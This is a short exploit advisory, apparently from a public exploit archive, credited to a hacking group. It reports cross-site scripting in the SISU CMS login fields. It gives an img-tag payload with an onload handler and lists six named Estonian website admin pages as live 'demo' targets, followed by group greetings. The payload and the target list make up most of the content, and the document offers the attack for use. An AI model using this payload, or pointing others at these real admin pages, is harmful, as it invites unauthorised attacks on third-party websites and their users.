###################### # Exploit Title : SISU CMS - Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.laborint.com/ # Category: [ Webapps ] # Tested on: [ Win ] # Date: 2016/05/26 ###################### # # PoC: # username and password Box vulnerable To XSS # Payload = <img src="http://www.imagenesderisa.com.mx/wp-content/uploads/2015/10/imagenes-de-risa-2.jpg" onload="alert('XSS')"</img> # Demo : # http://www.muuseum.ee/admin/ # http://www.etdm.ee/admin/ # http://www.dormitorium.ee/admin/ # http://www.meredivisjon.ee/admin/ # http://www.trt.ee/admin/ # http://www.thky.ee/admin/ # ###################### # Discovered by : # Mojtaba MobhaM & T3NZOG4N & FireKernel # Greetz : Milad Hacking And All Persian Hack Team Members # Homepage : persian-team.ir ######################